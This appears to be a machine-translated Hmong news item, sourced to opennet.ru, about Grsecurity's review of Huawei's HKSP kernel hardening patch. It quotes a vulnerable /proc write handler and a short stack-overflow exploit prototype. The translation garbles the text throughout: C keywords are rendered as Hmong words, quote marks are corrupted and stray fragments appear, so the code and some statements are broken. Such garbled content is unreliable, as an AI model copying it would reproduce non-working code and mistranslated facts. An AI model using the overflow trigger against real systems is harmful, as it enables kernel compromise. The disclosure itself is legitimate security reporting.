Cov neeg tsim tawm ntawm qhov project Grsecurity mloog mus rau lub xub ntiag ntawm ib tug trivial exploitable vulnerability nyob rau hauv lub thaj teeb (Huawei Kernel Self Protection), ob peb hnub dhau los los txhim kho kev ruaj ntseg ntawm Linux kernel. Qhov xwm txheej ceeb toom , nyob rau hauv uas ib qho kev sim los txhim kho kev ruaj ntseg system coj mus rau qhov tshwm sim ntawm qhov tsis zoo tshiab thiab ua kom yooj yim rau kev cuam tshuam cov khoom siv.
HKSP thaj ua rau thaj tau luam tawm los ntawm Huawei tus neeg ua haujlwm, suav nrog kev hais txog Huawei hauv GitHub profile, thiab siv lo lus Huawei hauv lub npe project (HKSP - Huawei Kernel Self Protection). Tib lub sijhawm, Huawei cov neeg sawv cev tsis lees paub qhov kev sib txuas ntawm HKSP qhov project nrog lub tuam txhab thiab tau hais tias cov cai tau tsim los ntawm tus neeg ua haujlwm tus kheej txoj haujlwm, tsis yog ib txoj haujlwm Huawei thiab tsis siv hauv tuam txhab cov khoom. Ntawm HKSP retroactively vulnerabilities kuj nco ntsoov tias qhov project yog tsim nyob rau hauv kuv lub sij hawm spare rau kev tshawb fawb lub hom phiaj.
HKSP suav nrog cov kev hloov pauv xws li randomization ntawm offsets hauv cov qauv cred, tiv thaiv kev tawm tsam ntawm tus neeg siv tus cim npe npe (pid namespace), kev sib cais ntawm cov txheej txheem pawg los ntawm thaj chaw mmap, nrhiav pom ob lub xov tooj mus rau kfree muaj nuj nqi, thaiv kev xau los ntawm pseudo -FS /proc (/proc/ {modules, keys, key-users}, /proc/sys/kernel/* and /proc/sys/vm/mmap_min_addr, /proc/kallsyms), txhim kho neeg siv chaw nyob randomization, ntxiv Ptrace kev tiv thaiv, txhim kho smap thiab smep kev tiv thaiv, muaj peev xwm txwv tsis pub xa cov ntaub ntawv los ntawm cov khoom siv raw, thaiv cov chaw nyob tsis raug hauv UDP qhov (sockets) thiab tshawb xyuas qhov kev ncaj ncees ntawm cov txheej txheem khiav. Nws kuj suav nrog Ksguard kernel module, uas yog tsom rau kev kuaj xyuas kev sim ua kom paub cov rootkits ib txwm.
Thaj Greg Kroah-Hartman, uas yog lub luag haujlwm los tswj cov ceg ruaj khov ntawm Linux kernel, yog qhov txaus siab, thiab hais kom tus kws sau ntawv rhuav tshem cov monolithic thaj ua rau qhov yooj yim txheeb xyuas thiab nce qib rau lub ntsiab lus. Kees Cook, taub hau rau nquag tiv thaiv thev naus laus zis hauv Linux ntsiav, thiab teb rau thaj ua rau thaj thiab, ntawm cov teeb meem, tau mloog zoo rau kev khi rau x86 architecture thiab kev ceeb toom xwm txheej ntawm ntau hom, uas tsuas yog sau cov ntaub ntawv hais txog qhov teeb meem, tab sis tsis txhob sim thaiv nws.
Kev kawm txog thaj tsam los ntawm Grsecurity developers tau qhia ntau qhov yuam kev thiab qhov tsis muaj zog hauv txoj cai, thiab kuj tau qhia qhov tsis muaj tus qauv kev hem thawj uas yuav tso cai rau lawv txiav txim siab txog qhov peev txheej ntawm qhov project. Txhawm rau ua kom pom tseeb tias cov cai tau sau tsis siv cov txheej txheem kev ruaj ntseg, muab piv txwv ntawm qhov tsis txaus ntseeg tsis txaus ntseeg hauv tus tuav.
file /proc/ksguard/state, uas yog tsim nrog txoj cai 0777, txhais tau hais tias txhua tus tau sau ntawv nkag. ksg_state_write muaj nuj nqi, siv los txheeb xyuas cov lus txib sau rau /proc/ksguard/state, tsim ib qho tmp[32] tsis rau cov ntaub ntawv twg yog sau raws li qhov loj ntawm qhov operand dhau, yam tsis xav txog qhov loj ntawm lub hom phiaj tsis thiab tsis muaj. tshawb xyuas qhov parameter nrog txoj hlua loj. Cov. Txhawm rau overwrite ib feem ntawm pawg pawg, tus neeg tawm tsam tsuas yog xav tau sau cov kab tshwj xeeb uas tau teev tseg rau /proc/ksguard/state.
static ssize_t ksg_state_write(struct file *file, const char __user *buf,
size_t len, loff_t *offset)
{
u64 nqi;.
char tmp[32];
size_t n = 0;
yog tias (copy_from_user(tmp, buf, len))
rov qab - 1;
value = simple_strtoul(tmp, '\0', 10);
...
Exploit prototype:
char buf[4096] = { };
int fd = open(β/proc/ksguard/stateβ, O_WRONLY);
yog (fd >= 0) {
sau(fd, buf, sizeof(buf));
kaw (fd);
}
Tau qhov twg los: opennet.ru